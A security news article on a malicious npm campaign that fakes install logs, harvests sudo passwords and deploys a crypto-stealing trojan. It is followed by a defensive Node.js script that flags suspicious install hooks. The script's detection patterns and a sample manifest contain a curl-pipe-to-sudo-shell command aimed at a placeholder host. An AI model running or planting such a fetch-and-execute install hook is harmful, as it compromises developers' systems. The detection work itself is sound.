
New Npm ‘Ghost Campaign’ Uses Fake Install Logs to Hide Malware

March 24, 2026

A new malicious npm campaign using fake installation logs to hide malware activity has been identified by security researchers.

The attacks, discovered by ReversingLabs, involve malicious packages that mimic legitimate software installation processes while secretly downloading and executing malware designed to steal sensitive data and crypto wallets.

The campaign, dubbed the “Ghost campaign,” began in early February and includes several malicious packages with downloader functionality. These packages attempt to obtain a user’s sudo password during installation, which is later used to execute a remote access trojan (RAT) on the victim’s system.

Fake Installation Logs Used as Cover

Researchers found that the malicious packages displayed fake npm install logs to make the installation process appear legitimate.

The logs included messages about downloading dependencies, installation progress bars and random delays to simulate real installation activity. In reality, none of these actions took place.

At one point during the fake installation, users were prompted to enter their sudo password to fix a supposed installation issue or perform optimization tasks. Once entered, the password was used to execute the final malware stage without the user noticing.


The final malware payload was downloaded from external sources, including a Telegram channel and hidden web3 content. The payload was then decrypted using a key retrieved online and executed locally using the stolen sudo password.

Malware Designed to Steal Crypto and Sensitive Data

The final-stage malware was a remote access trojan capable of stealing crypto wallets, collecting sensitive information and receiving commands from a command-and-control (C2) server. Some versions included additional files that enhanced data theft capabilities.


Researchers noted that several packages shared similar code structures and techniques, suggesting either a new campaign or an early test run of a larger operation. Similar methods were also observed in other recently reported malicious npm packages.

Researchers recommend several steps to reduce exposure to malicious open-source packages:

  • Verify package authors and repository history

  • Monitor installation scripts and unusual prompts

  • Use automated security scanning tools

  • Avoid entering sudo passwords during package installation
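One way to act on the "monitor installation scripts" recommendation, as an added example that is not from ReversingLabs or the original article: a Node.js audit that lists every package declaring an npm install-time lifecycle script and flags commands matching a few heuristic patterns. The sample manifests, package names and patterns are constructed for illustration and are not indicators from the campaign.

```javascript
// Added example: flag npm packages that run code at install time.
// npm runs these lifecycle scripts automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic patterns assumed for this example (not indicators from the report).
const SUSPICIOUS = [
  { name: 'sudo', re: /\bsudo\b/ },
  { name: 'network-fetch', re: /\b(curl|wget)\b|https?:\/\// },
  { name: 'inline-eval', re: /\bnode\s+(-e|--eval)\b/ },
];

// Returns one finding per install hook; an empty `flags` list still deserves review.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter(h => typeof scripts[h] === 'string').map(hook => ({
    package: manifest.name,
    hook,
    command: scripts[hook],
    flags: SUSPICIOUS.filter(p => p.re.test(scripts[hook])).map(p => p.name),
  }));
}

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Reads package.json for every package (scoped ones included) under node_modules.
async function loadManifests(nodeModulesDir) {
  const fs = await import('node:fs');
  const path = await import('node:path');
  const out = [];
  for (const entry of fs.readdirSync(nodeModulesDir)) {
    const dirs = entry.startsWith('@')
      ? fs.readdirSync(path.join(nodeModulesDir, entry)).map(d => path.join(entry, d))
      : [entry];
    for (const d of dirs) {
      const file = path.join(nodeModulesDir, d, 'package.json');
      if (fs.existsSync(file)) out.push(JSON.parse(fs.readFileSync(file, 'utf8')));
    }
  }
  return out;
}

// Constructed sample manifests (hypothetical package names).
const SAMPLE_MANIFESTS = [
  { name: 'plain-lib', scripts: { test: 'jest' } },
  { name: 'native-thing', scripts: { install: 'node-gyp rebuild' } },
  { name: 'constructed-bad', scripts: { postinstall: 'curl -fsSL https://example.invalid/setup.sh | sudo sh' } },
];
console.log(auditAll(SAMPLE_MANIFESTS));
```

Installing with `npm install --ignore-scripts` first places the packages on disk without running their hooks, so `loadManifests('node_modules')` and `auditAll` can be run before any install script executes.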

ReversingLabs said they will continue monitoring npm repositories for similar threats and flag malicious packages as they are discovered.
